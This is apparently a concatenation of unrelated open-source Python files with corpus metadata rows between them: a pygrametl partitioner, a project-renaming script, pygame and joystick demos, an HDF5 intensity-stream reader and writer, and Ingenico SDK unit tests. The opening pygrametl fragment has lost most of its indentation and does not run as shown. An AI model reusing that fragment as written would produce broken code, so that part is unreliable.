else:
self.parts.remove(part)
    def getpart(self, row, namemapping={}):
        """Find the part that should handle the given row. The implementation
        provided in BasePartitioner only uses round-robin partitioning, but
        subclasses may apply other methods."""
part = self.parts[self.__nextpart]
self.__nextpart = (self.__nextpart + 1) % len(self.parts)
return part
def endload(self):
"""Call endload on all parts"""
for part in self.parts:
part.endload()
class DimensionPartitioner(BasePartitioner):
"""A Dimension-like class that handles partitioning.
Partitioning is done between a number of Dimension objects called the
parts. The class offers the interface of Dimensions (incl. scdensure
from SlowlyChangingDimension). When a method is called, the
corresponding method on one of the parts (chosen by a user-definable
partitioner function) will be invoked. The parts can operate on a
single physical dimension table or different physical tables.
"""
def __init__(self, parts, getbyvalsfromall=False, partitioner=None):
"""Arguments:
- parts: a sequence of Dimension objects.
- getbyvalsfromall: determines if getbyvals should be answered by
means of all parts (when getbyvalsfromall = True) or only the
          first part, i.e., parts[0] (when getbyvalsfromall = False).
Default: False
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the lookupatts to the values of
the lookupatts. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the hash value of each value of the lookupatts
and adds them together.
"""
BasePartitioner.__init__(self, parts=parts)
self.getbyvalsfromall = getbyvalsfromall
self.lookupatts = parts[0].lookupatts
self.key = parts[0].key
for p in parts:
if not p.lookupatts == self.lookupatts:
raise ValueError('The parts must have the same lookupatts')
if not p.key == self.key:
raise ValueError('The parts must have the same key')
if partitioner is not None:
self.partitioner = partitioner
else:
# A partitioner that takes the hash of each attribute value in
# row and adds them all together:
# Reading from right to left: get the values, use hash() on each
# of them, and add all the hash values
self.partitioner = lambda row: reduce((lambda x, y: x + y),
map(hash, row.values()))
def getpart(self, row, namemapping={}):
"""Return the part that should handle the given row"""
vals = {}
for att in self.lookupatts:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
# Below this, methods like those in Dimensions:
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def __getbykeyhelper(self, keyvalue):
# Returns (rowresult, part). part is None if no result was found.
for part in self.parts:
row = part.getbykey(keyvalue)
if row[self.key] is not None:
return (row, part)
return (row, None)
def getbykey(self, keyvalue):
"""Invoke getbykey on the relevant Dimension part"""
return self.__getbykeyhelper(keyvalue)[0]
def getbyvals(self, values, namemapping={}):
"""Invoke getbyvals on the first part or all parts (depending on the
value of the instance's getbyvalsfromall)"""
if not self.getbyvalsfromall:
return self.parts[0].getbyvals(values, namemapping)
res = []
for part in self.parts:
res += part.getbyvals(values, namemapping)
return res
def update(self, row, namemapping={}):
"""Invoke update on the relevant Dimension part"""
keyval = row[namemapping.get(self.key) or self.key]
part = self.__getbykeyhelper(keyval)[1]
if part is not None:
part.update(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.insert(row, namemapping)
def scdensure(self, row, namemapping={}):
"""Invoke scdensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.scdensure(row, namemapping)
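# --- Illustrative sketch (not part of pygrametl): spreading dimension
# operations over two parts. 'part1' and 'part2' are hypothetical Dimension
# instances that must share the same key and lookupatts, e.g. two connections
# to the same physical table.
def _example_partitioned_ensure(part1, part2, rows):
    pdim = DimensionPartitioner([part1, part2])
    return [pdim.ensure(row) for row in rows]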
class FactTablePartitioner(BasePartitioner):
"""A FactTable-like class that handles partitioning.
Partitioning is done between a number of FactTable objects called the
parts. The class offers the interface of FactTable. When a method is
called, the corresponding method on one of the parts (chosen by a
user-definable partitioner function) will be invoked. The parts can
operate on a single physical fact table or different physical
tables.
"""
def __init__(self, parts, partitioner=None):
"""
Arguments:
- parts: a sequence of FactTable objects.
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the keyrefs to the values of
the keyrefs. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the sum of all the keyrefs values.
"""
BasePartitioner.__init__(self, parts=parts)
if partitioner is not None:
self.partitioner = partitioner
else:
self.partitioner = lambda row: reduce((lambda x, y: x + y),
row.values())
self.all = parts[0].all
self.keyrefs = parts[0].keyrefs
self.measures = parts[0].measures
for ft in parts:
if not (self.keyrefs == ft.keyrefs and
self.measures == ft.measures):
raise ValueError(
'The parts must have the same measures and keyrefs')
def getpart(self, row, namemapping={}):
"""Return the relevant part for the given row """
vals = {}
for att in self.keyrefs:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant part """
part = self.getpart(row, namemapping)
part.insert(row, namemapping)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant part """
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant part """
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
| bsd-2-clause | -3,030,556,517,807,855,600 | 44.030871 | 104 | 0.586979 | false |
amarchen/log4qt-demo-sailfish | rename-to-my-project.py | 1 | 3857 | '''
Created on 23.2.2014
@author: tace ([email protected])
'''
import sys
import os
import argparse
from os import rename
SCRIPT_NAME = os.path.basename(__file__)
def convert_file_names(files, originalName, newName):
print "\n>>>> Convert file names\n"
for fname in files:
if fname.find(originalName) != -1:
newFullName = fname.replace(originalName, newName, 1)
rename(fname, newFullName)
print "Renamed file " + fname + " --> " + newFullName
else:
print "File's '" + fname + "' name does not need conversion!"
print ">>>> DONE converting filenames"
print "====================================================================\n"
def convert_files_content(files, originalText, newText):
print "\n>>>> Convert files content\n"
for file in files:
newlines = []
with open(file, 'r') as f:
found = False
for i, line in enumerate(f, 1):
if line.find(originalText) != -1:
print "Converting text in file '" + file + "' at line " + str(i)
found = True
newlines.append(line.replace(originalText, newText))
if not found:
                print "File " + file + " doesn't need editing."
with open(file, 'w') as f:
for line in newlines:
f.write(line)
print ">>>> DONE converting files content"
print "====================================================================\n"
def get_files(path,
ignored_dirs=['.git'],
ignored_files=[SCRIPT_NAME],
ignore_binary_files=False):
for prefix, dirs, files in os.walk(path):
for ignore in ignored_dirs:
if ignore in dirs:
dirs.remove(ignore)
print "Ignored dir: " + ignore
for name in files:
ignored = False
for ignore in ignored_files:
if ignore in name:
files.remove(ignore)
ignored = True
print "Ignored file: " + ignore
if not ignored:
filename = os.path.join(prefix, name)
if ignore_binary_files and is_binary(filename):
print filename + " is BINARY file and ignored by default!"
else:
yield filename
def is_binary(filename):
"""
Return true if the given filename appears to be binary.
File is considered to be binary if it contains a NULL byte.
FIXME: This approach incorrectly reports UTF-16 as binary.
"""
with open(filename, 'rb') as f:
for block in f:
if '\0' in block:
return True
return False
def check_args(args):
if not args.newName.startswith('harbour-'):
print "Your new app name MUST start with \"harbour-\""
sys.exit()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('newName', help='New name of your program')
parser.add_argument('--originalName', nargs='?', default='harbour-helloworld-pro-sailfish', help="Default is '%(default)s'")
parser.add_argument('--ignoredDirs', nargs='*', default=['.git'], help="Give a list of dir paths separated with space. Default is '%(default)s'")
parser.add_argument('--ignoredFiles', nargs='*', default=[SCRIPT_NAME], help="Give a list of file paths separated with space. Default is '%(default)s'")
args = parser.parse_args()
check_args(args)
files = get_files(".", args.ignoredDirs, args.ignoredFiles)
convert_file_names(files, args.originalName, args.newName)
files = get_files(".", args.ignoredDirs, args.ignoredFiles, ignore_binary_files=True)
convert_files_content(files, args.originalName, args.newName)
if __name__ == '__main__':
main()
| unlicense | 760,484,320,337,282,400 | 37.188119 | 156 | 0.56028 | false |
mark-me/Pi-Jukebox | venv/Lib/site-packages/pygame/examples/mask.py | 1 | 5555 | #!/usr/bin/env python
"""A pygame.mask collision detection example
exports main()
This module can also be run as a stand-alone program, accepting
one or more image file names as command line arguments.
"""
import sys, random
import pygame, pygame.image, pygame.surface, pygame.time, pygame.display
def maskFromSurface(surface, threshold = 127):
#return pygame.mask.from_surface(surface, threshold)
mask = pygame.mask.Mask(surface.get_size())
key = surface.get_colorkey()
if key:
for y in range(surface.get_height()):
for x in range(surface.get_width()):
if surface.get_at((x,y)) != key:
mask.set_at((x,y),1)
else:
for y in range(surface.get_height()):
for x in range (surface.get_width()):
if surface.get_at((x,y))[3] > threshold:
mask.set_at((x,y),1)
return mask
def vadd(x,y):
return [x[0]+y[0],x[1]+y[1]]
def vsub(x,y):
return [x[0]-y[0],x[1]-y[1]]
def vdot(x,y):
return x[0]*y[0]+x[1]*y[1]
class Sprite:
def __init__(self, surface, mask = None):
self.surface = surface
if mask:
self.mask = mask
else:
self.mask = maskFromSurface(self.surface)
self.setPos([0,0])
self.setVelocity([0,0])
def setPos(self,pos):
self.pos = [pos[0],pos[1]]
def setVelocity(self,vel):
self.vel = [vel[0],vel[1]]
def move(self,dr):
self.pos = vadd(self.pos,dr)
def kick(self,impulse):
self.vel[0] += impulse[0]
self.vel[1] += impulse[1]
def collide(self,s):
"""Test if the sprites are colliding and
resolve the collision in this case."""
offset = [int(x) for x in vsub(s.pos,self.pos)]
overlap = self.mask.overlap_area(s.mask,offset)
if overlap == 0:
return
"""Calculate collision normal"""
nx = (self.mask.overlap_area(s.mask,(offset[0]+1,offset[1])) -
self.mask.overlap_area(s.mask,(offset[0]-1,offset[1])))
ny = (self.mask.overlap_area(s.mask,(offset[0],offset[1]+1)) -
self.mask.overlap_area(s.mask,(offset[0],offset[1]-1)))
if nx == 0 and ny == 0:
"""One sprite is inside another"""
return
n = [nx,ny]
dv = vsub(s.vel,self.vel)
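        # With equal masses, J is the per-sprite impulse that equalises the
        # normal components of the velocities (a perfectly inelastic response);
        # scaling it by 2 would give a fully elastic bounce, hence 1.9 below.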
J = vdot(dv,n)/(2*vdot(n,n))
if J > 0:
"""Can scale up to 2*J here to get bouncy collisions"""
J *= 1.9
self.kick([nx*J,ny*J])
s.kick([-J*nx,-J*ny])
return
"""Separate the sprites"""
c1 = -overlap/vdot(n,n)
c2 = -c1/2
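        # Shift the two sprites by overlap/(2*|n|^2) in opposite directions
        # along the collision normal to push the masks apart.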
self.move([c2*nx,c2*ny])
s.move([(c1+c2)*nx,(c1+c2)*ny])
def update(self,dt):
self.pos[0] += dt*self.vel[0]
self.pos[1] += dt*self.vel[1]
def main(*args):
    """Display multiple images bouncing off each other using collision detection
Positional arguments:
one or more image file names.
    This pygame.mask demo will display multiple moving sprites bouncing
off each other. More than one sprite image can be provided.
"""
if len(args) == 0:
        raise ValueError("Require at least one image file name: none given")
print ('Press any key to quit')
screen = pygame.display.set_mode((640,480))
images = []
masks = []
for impath in args:
images.append(pygame.image.load(impath).convert_alpha())
masks.append(maskFromSurface(images[-1]))
numtimes = 10
import time
t1 = time.time()
for x in range(numtimes):
m = maskFromSurface(images[-1])
t2 = time.time()
print ("python maskFromSurface :%s" % (t2-t1))
t1 = time.time()
for x in range(numtimes):
m = pygame.mask.from_surface(images[-1])
t2 = time.time()
print ("C pygame.mask.from_surface :%s" % (t2-t1))
sprites = []
for i in range(20):
j = i % len(images)
s = Sprite(images[j],masks[j])
s.setPos((random.uniform(0,screen.get_width()),
random.uniform(0,screen.get_height())))
s.setVelocity((random.uniform(-5,5),random.uniform(-5,5)))
sprites.append(s)
pygame.time.set_timer(pygame.USEREVENT,33)
while 1:
event = pygame.event.wait()
if event.type == pygame.QUIT:
return
elif event.type == pygame.USEREVENT:
"""Do both mechanics and screen update"""
screen.fill((240,220,100))
for i in range(len(sprites)):
for j in range(i+1,len(sprites)):
sprites[i].collide(sprites[j])
for s in sprites:
s.update(1)
if s.pos[0] < -s.surface.get_width()-3:
s.pos[0] = screen.get_width()
elif s.pos[0] > screen.get_width()+3:
s.pos[0] = -s.surface.get_width()
if s.pos[1] < -s.surface.get_height()-3:
s.pos[1] = screen.get_height()
elif s.pos[1] > screen.get_height()+3:
s.pos[1] = -s.surface.get_height()
screen.blit(s.surface,s.pos)
pygame.display.update()
elif event.type == pygame.KEYDOWN:
return
if __name__ == '__main__':
if len(sys.argv) < 2:
print ('Usage: mask.py <IMAGE> [<IMAGE> ...]')
print ('Let many copies of IMAGE(s) bounce against each other')
print ('Press any key to quit')
else:
main(*sys.argv[1:])
| agpl-3.0 | 1,926,169,614,142,610,700 | 30.5625 | 78 | 0.540954 | false |
CHIMEFRB/ch_frb_io | ch_frb_io/stream.py | 1 | 13853 | """
IO for intensity data.
"""
import os
from os import path
import warnings
import logging
import glob
import numpy as np
import h5py
import bitshuffle.h5 as bshufh5
logger = logging.getLogger(__name__)
# Default chunk and file size.
CHUNKS = (64, 2, 256)
NTIME_PER_FILE = CHUNKS[2] * 64
# Dataset definitions.
DATASETS = {
# 'time' is a special axis defining dataset. Must have units seconds since
# it is used for filenames.
'index_map/time' : {
'dtype' : np.float64,
'chunks' : (CHUNKS[2],),
},
'intensity' : {
'dtype' : np.float32,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
'weight' : {
'dtype' : np.uint8,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
}
class StreamWriter(object):
def __init__(self, outdir='', freq=None, pol=None, attrs=None):
# Default values for freq and pol.
if freq is None:
from ch_L1mock import constants
freq = (constants.FPGA_FREQ0 + np.arange(constants.FPGA_NFREQ)
* constants.FPGA_DELTA_FREQ)
if pol is None:
pol = ['XX', 'YY']
self._outdir = outdir
self._freq = freq
self._nfreq = len(freq)
self._pol = pol
self._npol = len(pol)
if attrs is None:
attrs = {}
self._attrs = attrs
# For now these are statically defined.
self._ntime_per_file = NTIME_PER_FILE
self._ntime_block = CHUNKS[2]
self._datasets = dict(DATASETS)
assert self._ntime_per_file % self.ntime_block == 0
# Initialize dataset buffers.
self._buffers = {}
datasets = dict(self._datasets)
time_info = datasets.pop('index_map/time')
self._buffers['index_map/time'] = np.empty(self.ntime_block,
dtype=time_info['dtype'])
for name, info in datasets.items():
if info['axis'] != ['freq', 'pol', 'time']:
msg = "Only ('freq', 'pol', 'time') datasets supported."
raise NotImplementedError(msg)
self._buffers[name] = np.empty(
(self._nfreq, self._npol, self.ntime_block),
dtype = info['dtype']
)
if self.ntime_block % info['chunks'][2]:
msg = "Integer number of chunks must fit into buffer."
raise ValueError(msg)
# TODO Check sanity of other chunk dimensions.
# Buffers initially empty.
self._ntime_buffer = 0
# Initialize output.
self._file = None
self._t0 = None # Offset for file names.
if not path.isdir(outdir):
os.mkdir(outdir)
# Ensure that warnings only issued once.
self._alignment_warned = False
def __del__(self):
self.finalize()
@property
def ntime_block(self):
"""Target write size. The size of the buffer when full."""
return self._ntime_block
@property
def ntime_buffer(self):
"""Current number of times currently in the buffer."""
return self._ntime_buffer
@property
def ntime_current_file(self):
"""Number of times in current file."""
if self._file is None:
return 0
else:
return len(self._file['index_map/time'])
@property
def ntime_per_file(self):
return self._ntime_per_file
def absorb_chunk(self, **kwargs):
"""
"""
time = kwargs.pop('time')
ntime = len(time)
for name, data in kwargs.items():
if data.shape != (self._nfreq, self._npol, ntime):
msg = "Inconsistent dimensions for dataset %s" % name
raise ValueError(msg)
kwargs['index_map/time'] = time
assert set(kwargs.keys()) == set(DATASETS.keys())
ntime_consumed = 0
while ntime_consumed < ntime:
ntime_remaining = ntime - ntime_consumed
if self.ntime_buffer == 0 and ntime_remaining >= self.ntime_block:
# If the buffers are empty and ntime is bigger than the buffer
# size, do a direct write.
to_write = (ntime_remaining
- (ntime_remaining % self.ntime_block))
to_write = min(to_write,
self._ntime_per_file - self.ntime_current_file)
self._append_data_disk(
ntime_consumed,
ntime_consumed + to_write,
**kwargs
)
ntime_consumed = ntime_consumed + to_write
else:
# Add data to buffers.
to_buffer = min(self.ntime_block - self.ntime_buffer,
ntime_remaining)
self._append_data_buffers(
ntime_consumed,
ntime_consumed + to_buffer,
**kwargs
)
ntime_consumed = ntime_consumed + to_buffer
def flush(self):
if (self.ntime_buffer != self.ntime_block
and not self._alignment_warned):
msg = ("Flushing buffers that are not full. Expect alignment"
" issues and performance degradation.")
logger.warning(msg)
self._alignment_warned = True
self._append_data_disk(0, self.ntime_buffer, **self._buffers)
self._ntime_buffer = 0
def finalize(self):
# Do nothing if this has already been called.
if hasattr(self, '_datasets'):
# Suppress warning if the buffers aren't full.
self._alignment_warned = True
self.flush()
if self._file:
self._file.close()
# The following does two things: releases memory which is nice, but
# more importantly invalidates the instance.
del self._buffers
del self._datasets
def _initialize_file(self, first_time):
# Files are named with their starting time relative to beginning of
# acquisition.
if self._t0 is None:
self._t0 = first_time
first_time -= self._t0
fname = '%08d.h5' % int(round(first_time))
fname = path.join(self._outdir, fname)
# Open file and write non-time-dependant datasets.
f = h5py.File(fname, mode='w')
for name, value in self._attrs.items():
f.attrs[name] = value
# Index map
im = f.create_group('index_map')
im.create_dataset('pol', data=self._pol)
im.create_dataset('freq', data=self._freq)
# Initialize time dependant datasets.
datasets = dict(self._datasets)
time_dset_info = datasets.pop('index_map/time')
f.create_dataset(
'index_map/time',
shape=(0,),
maxshape=(None,),
dtype=time_dset_info['dtype'],
chunks=time_dset_info['chunks'],
)
for dset_name, dset_info in datasets.items():
compression = dset_info.get('compression', None)
compression_opts = dset_info.get('compression_opts', None)
dset = f.create_dataset(
dset_name,
shape=(self._nfreq, self._npol, 0),
maxshape=(self._nfreq, self._npol, None),
dtype=dset_info['dtype'],
chunks=dset_info['chunks'],
compression=compression,
compression_opts=compression_opts,
)
dset.attrs['axis'] = dset_info['axis']
self._file = f
def _append_data_disk(self, start, stop, **kwargs):
if self._file is None:
first_time = kwargs['index_map/time'][start]
self._initialize_file(first_time)
ntime_disk = self.ntime_current_file
ntime = stop - start
time = kwargs.pop('index_map/time')
self._file['index_map/time'].resize((ntime_disk + ntime,))
self._file['index_map/time'][ntime_disk:] = time[start:stop]
for name, data in kwargs.items():
dset = self._file[name]
dset.resize((self._nfreq, self._npol, ntime_disk + ntime))
dset[...,ntime_disk:] = data[...,start:stop]
if ntime_disk + ntime >= self._ntime_per_file:
self._file.close()
self._file = None
def _append_data_buffers(self, start, stop, **kwargs):
ntime = stop - start
for name, data in kwargs.items():
buf = self._buffers[name]
buf_sl = np.s_[...,self.ntime_buffer:self.ntime_buffer + ntime]
buf[buf_sl] = data[...,start:stop]
self._ntime_buffer += ntime
if self.ntime_buffer == self.ntime_block:
self.flush()
class StreamReader(object):
def __init__(self, datadir):
filenames = glob.glob(path.join(datadir, ("[0-9]" * 8 + '.h5')))
filenames.sort()
self._filenames = filenames
first_file = h5py.File(filenames[0], mode='r')
self._attrs = first_file.attrs
self._freq = first_file['index_map/freq'][:]
self._pol = first_file['index_map/pol'][:]
time_arrs = []
for fname in filenames:
f = h5py.File(fname, mode='r')
time_arrs.append(f['index_map/time'][:])
f.close()
self._ntimes = [len(t) for t in time_arrs]
self._time = np.concatenate(time_arrs)
datasets = dict(DATASETS)
del datasets['index_map/time']
for k in datasets.keys():
if k not in first_file:
del datasets[k]
self._datasets = datasets
self._current_time_ind = 0
self._time_chunk = CHUNKS[2]
# The following no longer a constraint.
#for nt in self._ntimes[:-1]:
# if nt % self._time_chunk:
# raise ValueError("Files don't have integer number of chunks.")
self._h5_cache_start_ind = None
first_file.close()
@property
def attrs(self):
return dict(self._attrs)
@property
def filenames(self):
return list(self._filenames)
@property
def freq(self):
return self._freq.copy()
@property
def pol(self):
return self._pol.copy()
@property
def time(self):
return self._time.copy()
@property
def current_time_ind(self):
return self._current_time_ind
@property
    def ntime_block(self):
        """Target read size."""
        return self._time_chunk
def finalize(self):
pass
#[f.close() for f in self._files]
def __del__(self):
self.finalize()
def yield_chunk(self, ntime=None):
start_time_ind = self.current_time_ind
ntime_remaining = len(self.time) - start_time_ind
if ntime is None:
            ntime = min(self._time_chunk, ntime_remaining)
if ntime > ntime_remaining or ntime == 0:
raise StopIteration()
out = {}
out['time'] = self.time[start_time_ind:start_time_ind + ntime]
dataset_names = self._datasets.keys()
for dataset_name in dataset_names:
out[dataset_name] = []
while self.current_time_ind < start_time_ind + ntime:
# Ensure 'current_time_ind' is in the cache.
self._cache_h5_chunk()
# Determine where in the cache current_time_ind is.
h5_cache_ind = self.current_time_ind - self._h5_cache_start_ind
h5_cache_size = self._h5_cache[dataset_names[0]].shape[-1]
# How much data to copy from the current cache.
ntime_this_cache = min(
# Either the whole cache...
h5_cache_size - h5_cache_ind,
# ... or the rest of the data needed for this chunk.
start_time_ind + ntime - self.current_time_ind,
)
h5_cache_slice = np.s_[h5_cache_ind:
h5_cache_ind + ntime_this_cache]
for dataset_name in dataset_names:
out[dataset_name].append(
self._h5_cache[dataset_name][...,h5_cache_slice])
self._current_time_ind += ntime_this_cache
# Concatenate all the h5 chunks together to form an output chunk.
for dataset_name in dataset_names:
out[dataset_name] = np.concatenate(out[dataset_name], -1)
return out
def _cache_h5_chunk(self):
file_time_ind = self.current_time_ind
file_ntimes = list(self._ntimes)
which_file = 0
while file_time_ind >= file_ntimes[which_file]:
file_time_ind -= file_ntimes[which_file]
which_file += 1
# Get the hdf5 chunk that contains the index.
file_time_ind = (int(file_time_ind // self._time_chunk)
* self._time_chunk)
h5_cache_start_ind = (np.sum(file_ntimes[:which_file], dtype=int)
+ file_time_ind)
if self._h5_cache_start_ind == h5_cache_start_ind:
return
self._h5_cache_start_ind = h5_cache_start_ind
f = h5py.File(self._filenames[which_file], mode='r')
self._h5_cache = {}
for dataset_name in self._datasets.keys():
dataset = f[dataset_name]
self._h5_cache[dataset_name] = dataset[...,
file_time_ind:file_time_ind + self._time_chunk]
f.close()
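# --- Illustrative usage sketch (not part of ch_frb_io): write a few chunks of
# random intensity data with StreamWriter and read one chunk back with
# StreamReader. The directory name and the 16-channel frequency axis are
# arbitrary choices made for this example.
def _example_roundtrip(outdir='example_acq'):
    nfreq, npol, ntime = 16, 2, CHUNKS[2]
    writer = StreamWriter(outdir=outdir, freq=np.arange(nfreq), pol=['XX', 'YY'])
    for i in range(4):
        writer.absorb_chunk(
            time=np.arange(i * ntime, (i + 1) * ntime, dtype=np.float64),
            intensity=np.random.rand(nfreq, npol, ntime).astype(np.float32),
            weight=np.ones((nfreq, npol, ntime), dtype=np.uint8),
        )
    writer.finalize()
    reader = StreamReader(outdir)
    return reader.yield_chunk(ntime)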
| mit | 5,522,448,106,118,149,000 | 32.953431 | 79 | 0.532664 | false |
martinohanlon/initio | pygametest.py | 1 | 1057 | import pygame
from pygame.locals import *
import os, sys
# set SDL to use the dummy NULL video driver,
# so it doesn't need a windowing system.
os.environ["SDL_VIDEODRIVER"] = "dummy"
# init pygame
pygame.init()
# create a 1x1 pixel screen, its not used
screen = pygame.display.set_mode((1, 1))
# init the joystick control
pygame.joystick.init()
# how many joysticks are there
print pygame.joystick.get_count()
# get the first joystick
joy = pygame.joystick.Joystick(0)
# init that joystick
joy.init()
running = True
while(running):
for event in pygame.event.get():
#thumb sticks, trigger buttons
if event.type == JOYAXISMOTION:
print event.value, event.axis
#d pad
elif event.type == JOYHATMOTION:
print event.value
#button pressed
elif event.type == JOYBUTTONDOWN:
print event.button
#button released
elif event.type == JOYBUTTONUP:
print event.button
| mit | -8,737,356,488,751,904,000 | 20.978261 | 46 | 0.613056 | false |
Ingenico-ePayments/connect-sdk-python3 | tests/unit/test_client.py | 1 | 5484 | import base64
import unittest
from datetime import timedelta
from unittest.mock import Mock, MagicMock
from ingenico.connect.sdk.connection import Connection
from ingenico.connect.sdk.defaultimpl.default_marshaller import DefaultMarshaller
from ingenico.connect.sdk.factory import Factory
from ingenico.connect.sdk.pooled_connection import PooledConnection
from ingenico.connect.sdk.request_header import RequestHeader
from tests.unit.test_factory import PROPERTIES_URI, API_KEY_ID, SECRET_API_KEY
class ClientTest(unittest.TestCase):
    """Tests for the Client class that check whether
    the function Client.with_client_meta_info correctly returns a client that is only modified when necessary.
    Also contains tests that check whether connection settings are propagated properly to the connection object.
"""
def test_with_client_meta_info(self):
"""Tests if the function withClientMetaInfo alters a client when it needs to and does nothing if not required"""
client1 = Factory.create_client_from_file(PROPERTIES_URI, API_KEY_ID, SECRET_API_KEY)
# client2 = client1.with_client_meta_info(None)
client2 = client1.with_client_meta_info(None)
client_meta_info = DefaultMarshaller.INSTANCE().marshal({"test": "test"})
client3 = client1.with_client_meta_info(client_meta_info)
client4 = client3.with_client_meta_info(client_meta_info)
client5 = client3.with_client_meta_info(None)
self.assertIsNone(client1._client_headers)
self.assertIs(client1, client2)
self.assertIsNot(client1, client3)
self.assertClientHeaders(client3, client_meta_info)
self.assertIs(client3, client4)
self.assertIsNot(client3, client5)
self.assertIsNone(client5._client_headers)
def assertClientHeaders(self, client, client_meta_info):
"""Checks that the 'ClientMetaInfo' header with client_meta_info is stored properly in the client"""
headers = client._client_headers
header_value = base64.b64encode(client_meta_info.encode("utf-8"))
expected = RequestHeader("X-GCS-ClientMetaInfo", header_value)
found = False
for header in headers:
if str(expected) == str(header):
found = True
self.assertTrue(found, "header {0} was not found in {1}".format(expected, headers))
    def test_close_idle_connection_not_pooled(self):
        """Tests that the setting to close an idle connection in a client does not propagate to the connection
        for an unpooled connection
"""
mock = MagicMock(spec=Connection(), autospec=True)
function_mock = Mock(name="close_idle_connections_mock")
mock.attach_mock(function_mock, "close_idle_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI, connection=mock,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY)
client = Factory.create_client_from_session(session)
client.close_idle_connections(timedelta(seconds=5)) # seconds
function_mock.assert_not_called()
def test_close_idle_connection_pooled(self):
"""Tests that the setting to close an idle connection in a client propagates to the connection
for a pooled connection
"""
pooled_mock = MagicMock(spec=PooledConnection(), autospec=True)
function_mock = Mock(name="close_idle_connections_mock")
pooled_mock.attach_mock(function_mock, "close_idle_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI, connection=pooled_mock,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY)
client = Factory.create_client_from_session(session)
client.close_idle_connections(timedelta(seconds=5)) # seconds
function_mock.assert_called_once_with(timedelta(seconds=5))
def test_close_expired_connections_not_pooled(self):
"""Tests that the setting to close an expired connection in a client does not propagate to the connection
for an unpooled connection
"""
mock = MagicMock(spec=Connection(), autospec=True)
function_mock = Mock(name="close_expired_connections_mock")
mock.attach_mock(function_mock, "close_expired_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY, connection=mock)
client = Factory.create_client_from_session(session)
client.close_expired_connections()
function_mock.assert_not_called()
def test_close_expired_connections_pooled(self):
"""Tests that the setting to close an expired connection in a client propagates to the connection
for a pooled connection
"""
pooled_mock = MagicMock(spec=PooledConnection(), autospec=True)
function_mock = Mock(name="close_expired_connections_mock")
pooled_mock.attach_mock(function_mock, "close_expired_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI, connection=pooled_mock,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY)
client = Factory.create_client_from_session(session)
client.close_expired_connections()
function_mock.assert_called_once_with()
if __name__ == '__main__':
unittest.main()
| mit | 4,281,008,586,416,672,000 | 45.871795 | 120 | 0.695478 | false |
mark-burnett/code-scientist | code_scientist/database/__init__.py | 1 | 1655 | # Copyright (C) 2012 Mark Burnett, David Morton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlalchemy as _sa
import sqlalchemy.orm as _orm
import logging as _logging
import base as _base
import tables as _tables
from function import Function
from file import File
from file_set import FileSet
from snapshot import Snapshot
from repository import Repository
from tag import Tag
from metric import Metric
from metric_value import FunctionMetricValue, FileMetricValue
from metric_value import FileSetMetricValue, SnapshotMetricValue
def initialize(engine_string='sqlite://'):
_logging.debug('Creating SQLAlchemy engine for string: %s', engine_string)
engine = _sa.create_engine(engine_string)
_logging.debug('Creating tables.')
_base.Base.metadata.create_all(engine)
_base.Base.metadata.bind = engine
_logging.debug('Creating Session class.')
global Session
global UnscopedSession
UnscopedSession = _orm.sessionmaker(bind=engine)
Session = _orm.scoped_session(UnscopedSession)
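# --- Illustrative sketch (not part of code-scientist): typical start-up. The
# sqlite URL is a hypothetical example, and the query assumes Repository is a
# mapped model class; after initialize(), the module-level Session can be used
# to create sessions bound to the newly created engine.
def _example_setup():
    initialize('sqlite:///code_scientist_example.db')
    session = Session()
    return session.query(Repository).all()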
| gpl-3.0 | -3,192,524,026,105,203,000 | 34.212766 | 78 | 0.753474 | false |
pombredanne/DjangoRestMultipleModels | docs/conf.py | 1 | 9780 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# DjangoRestMultipleModels documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 9 15:00:02 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
